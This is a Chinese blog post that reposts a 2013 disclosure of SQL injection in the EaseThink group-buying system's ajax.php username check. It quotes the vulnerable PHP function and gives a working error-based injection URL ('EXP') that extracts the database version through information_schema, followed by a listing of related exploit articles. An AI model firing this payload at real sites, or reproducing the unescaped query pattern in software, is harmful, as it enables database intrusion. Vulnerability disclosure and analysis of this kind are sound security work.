易想(easethink)团购系统ajax文件导致SQL注入漏洞

最新推荐文章于 2021-08-06 10:51:09 发布
最新推荐文章于 2021-08-06 10:51:09 发布
阅读量974 收藏
点赞数
分类专栏: 漏洞收集 文章标签: easethink
发布时间:2013-04-18  关键词: easethink 易想团购 ajax sql注入
易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。

在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。

system\libs\user.php中:

* 验证会员数据
*/
function check_user($field_name,$field_data)
{
//开始数据验证
$user_data[$field_name] = $field_data;
$res = array('status'=>1,'info'=>'','data'=>''); //用于返回的数据
if(trim($user_data['user_name'])==''&&$field_name=='user_name')
{
$field_item['field_name'] = 'user_name';
$field_item['error'] = EMPTY_ERROR;
$res['status'] = 0;
$res['data'] = $field_item;
return $res;
}
if($field_name=='user_name'&&$GLOBALS['db']->getOne("select count(*) from ".DB_PREFIX."user where user_name = '".trim($user_data['user_name'])."' and id <> ".intval($user_data['id']))>0)
//这里的$user_data['user_name']的值是注册用户名提交值,这里只过滤了空格,过滤不严格导致SQL注入漏洞。
{
$field_item['field_name'] = 'user_name';
$field_item['error'] = EXIST_ERROR;
$res['status'] = 0;
$res['data'] = $field_item;
return $res;
}

EXP:
http://目标网址/easethink_free_v1.4/ajax.php?act=check_field&field_name=user_name&field_data='and/**/(select/**/1/**/from/**/(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
7禧
关注
专栏目录
easethink 这是个目前比较好用的php,兼thinkphp框架开发的团购程序!
06-29
这是我花钱买的现在与大家分享 easethink 这是个目前比较好用的php,兼thinkphp框架开发的团购程序!
易想 easethink_v1.8 商业
08-06
标题中的“易想 easethink_v1.8 商业”很可能指的是一个名为“易想”的软件产品,版本为1.8,并且是商业版本。这个软件可能是用于网站开发或者内容管理系统的工具,因为文件列表中包含了多个PHP文件,这通常是Web...
易想团购 注入 user.php,易想easethink团购系统ajax文件导致SQL注入漏洞
weixin_35713824的博客
04-10 377
发布时间:2013-04-18 关键词:easethink易想团购 ajaxsql注入易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。在注册界面,输入用户名后台会验证用户名是否存在,这里是通过ajax去验证,目前很多程序都会忽略这里的过滤而导致SQL注入。system\libs\user...
易想团购 注入 user.php,易想购物(easethink)存在sql注入漏洞,附利用测试POC
weixin_34556619的博客
04-10 178
漏洞概要缺陷编号:WooYun-2013-022023漏洞标题:易想购物(easethink)存在sql注入漏洞,附利用测试POC相关厂商:易想购物漏洞作者:lxsec提交时间:2013-04-17 15:06公开时间:2013-07-16 15:06漏洞类型:SQL注射漏洞危害等级:中自评Rank:10漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2013-04-17: ...
ajax漏洞 sql注入,易想团购ajax.php SQL注入分析和Exp漏洞预警 -电脑资料
weixin_29696999的博客
08-06 511
在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php,* 验证会员数据 */ function check_user($field_name,$field_data) { //开始数据验证 $user_data[$field_name] = $field_data; $res = array('status'=>1,'info'=>'',...
易想团购 注入 user.php,最新易想团购系统通杀SQL注入漏洞分析附利用exp
weixin_42365898的博客
04-10 169
作者:Seay刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){if (getenv("HTTP_CLIENT_IP") && strcasecmp(geten...
易想团购系统 1.4.rar
05-24
易想团购管理系统是一套定位中高端市场的团购内容管理系统,能够以最低的成本,最少的人力投入在最短的时间架设一个功能齐全、性能优异、规模庞大并易于维护的网站平台。 易想团购系统 1.4 更新内容: 1.修正...
免费版易想团购系统
05-24
【标题】:“免费版易想团购系统” 在IT行业中,团购系统是一种常见的电子商务平台,它允许用户以集体购买的方式获取商品或服务的折扣。"易想团购系统"是一款专为此目的设计的软件解决方案,尤其值得一提的是,这个...
易想(PHP)团购系统 v1.0.rar
07-09
易想团购系统商业版v1.0 主要功能列表 1. 团购分类:可为团购分类设置从属关联 2. 供应商帐户管理:可为每个供应商设置多个子帐户,用于确认团购券的操作,系统会自动记录xx团购券由xx商户的xx管理员进行操作。 3. ...
易想会员管理营销系统源代码
03-18
易想会员管理营销系统是我司历时两年打造一款B/S结构商业会员系统,技术架构为PHP+MYSQL,系统功能涵盖了会员线上线下一体化、线上电子商务、门店、会员卡、线上线下充值、消费、积分、优惠券等功能,专门为商家或...
easethink整站下载
06-25
这是个目前比较好用的php,兼thinkphp框架开发的团购程序!
易想商城系统开源版
10-09
商城系统,代码开源 所有文件带有 .cs文件,某些编译后的dll文件也已成功破解,这个代码仅供大家学习,学理念,学思想,学架构。认真看完代码的,估计水平能上一大截。3分不多,一个评论也就回来了。
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用
ぃ妖气ぅ的博客
04-10 273
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。找到get_client_ip()函数:// 获取客户端IP地址function get_client_ip(){if (get...
易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...
weixin_28918553的博客
04-10 131
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序,找到get_client_ip()函数。// 获取客户端IP地址function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("H...
最新易想团购系统通杀SQL注入漏洞分析附利用exp
收集盒 Book box
04-20 1003
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数。 // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购系统通杀SQL注入漏洞分析及利用
代码析构师的专栏
05-12 770
刚打开红黑看到基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数: // 获取客户端IP地址 function get_client_ip(){ if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTT
易想团购 注入 user.php,易想团购ajax.php SQL注入分析和Exp
weixin_39608613的博客
04-10 72
作者:f4ckr00t在注册的时候,输入用户名后台会验证用户名是否存在,当然是通过ajax去验证的也就是ajax.php。很多程序多会忽略这个导致存在SQL注入。* 验证会员数据*/function check_user($field_name,$field_data){//开始数据验证$user_data[$field_name] = $field_data;$res = array('stat...
毕业设计论文Nodejs+Vue宠物店管理系统.docx
最新发布
10-16
毕业设计论文
易想商城系统开源版V3.1深度评测
资源摘要信息:"易想商城系统开源版 v3.1是基于仿照知名电商平台红孩子模式开发的开源电子商务解决方案。它旨在为用户提供一个功能完善、易于使用、可定制性强的B2C电子商务平台。该系统支持商品管理、订单处理、支付...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值